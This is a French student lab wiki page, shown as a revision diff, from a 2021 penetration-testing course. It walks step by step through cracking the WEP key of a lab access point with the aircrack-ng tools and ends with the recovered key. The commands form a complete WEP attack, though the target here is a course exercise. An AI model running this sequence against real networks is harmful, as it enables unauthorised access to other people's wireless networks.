TP sysres IMA5 2021/2022 G4 : Différence entre versions
De Wiki d'activités IMA
(→5.2 Cassage de clef WEP d’un point d’accès WiFi) |
(→5.2 Cassage de clef WEP d’un point d’accès WiFi) |
||
Ligne 3 : | Ligne 3 : | ||
===5.2 Cassage de clef WEP d’un point d’accès WiFi === | ===5.2 Cassage de clef WEP d’un point d’accès WiFi === | ||
− | + | On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande : | |
− | airmon-ng | + | airmon-ng |
− | + | On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long) | |
− | airmon-ng start | + | |
+ | On démarre l'interface sur le channel 3 : | ||
+ | airmon-ng start wlan0mon 3 | ||
− | + | On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP | |
− | airodump-ng | + | airodump-ng wlan0mon |
− | + | On réalise un test d'injection sur cracotte10 | |
− | aireplay-ng -9 -e | + | aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon |
− | |||
− | |||
− | |||
− | |||
− | + | On récupère les VI générés par le point d'accès pour les stocker dans output : | |
− | airodump-ng -c 3 --bssid 04:DA:D2:9C:50: | + | airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | On effectue de fausses authentifications | |
+ | aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon | ||
− | La clef WEP est | + | La clef WEP est décriptable : |
− | aircrack-ng -b 04:DA:D2:9C:50: | + | aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap |
− | + | Le résultat obtenu est le suivant : | |
− | KEY FOUND! [ | + | KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] |
Decrypted correctly: 100% | Decrypted correctly: 100% |
Version du 11 octobre 2021 à 17:47
Tests D'intrusions
5.2 Cassage de clef WEP d’un point d’accès WiFi
On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande :
airmon-ng
On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long)
On démarre l'interface sur le channel 3 :
airmon-ng start wlan0mon 3
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP
airodump-ng wlan0mon
On réalise un test d'injection sur cracotte10
aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon
On récupère les VI générés par le point d'accès pour les stocker dans output :
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon
On effectue de fausses authentifications
aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon
La clef WEP est décriptable :
aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap
Le résultat obtenu est le suivant :
KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] Decrypted correctly: 100%